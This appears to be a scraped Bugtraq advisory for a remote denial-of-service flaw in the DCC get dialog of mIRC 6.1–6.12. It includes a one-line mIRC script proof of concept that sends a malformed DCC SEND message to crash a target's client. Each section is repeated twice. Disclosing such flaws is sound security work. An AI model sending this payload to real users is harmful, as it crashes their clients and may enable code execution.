mIRC DCC Get Dialog Denial Of Service Vulnerability
BID:9492
Info
mIRC DCC Get Dialog Denial Of Service Vulnerability
| Bugtraq ID: | 9492 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 26 2004 12:00AM |
| Updated: | Jan 26 2004 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to MASTER VIPER <[email protected]>. |
| Vulnerable: |
Khaled Mardam-Bey mIRC 6.12 Khaled Mardam-Bey mIRC 6.11 Khaled Mardam-Bey mIRC 6.1 |
| Not Vulnerable: | |
Discussion
mIRC DCC Get Dialog Denial Of Service Vulnerability
A vulnerability has been reported to exist in mIRC that may allow a remote attacker to crash a vulnerable mIRC client.
It has been reported that the issue will present itself only in certain circumstances. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a remote attacker may potentially lever this issue to have arbitrary code executed in the context of the affected mIRC client.
A vulnerability has been reported to exist in mIRC that may allow a remote attacker to crash a vulnerable mIRC client.
It has been reported that the issue will present itself only in certain circumstances. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a remote attacker may potentially lever this issue to have arbitrary code executed in the context of the affected mIRC client.
Exploit / POC
mIRC DCC Get Dialog Denial Of Service Vulnerability
The following proof of concept has been supplied:
alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) }
The following proof of concept has been supplied:
alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) }
Solution / Fix
mIRC DCC Get Dialog Denial Of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.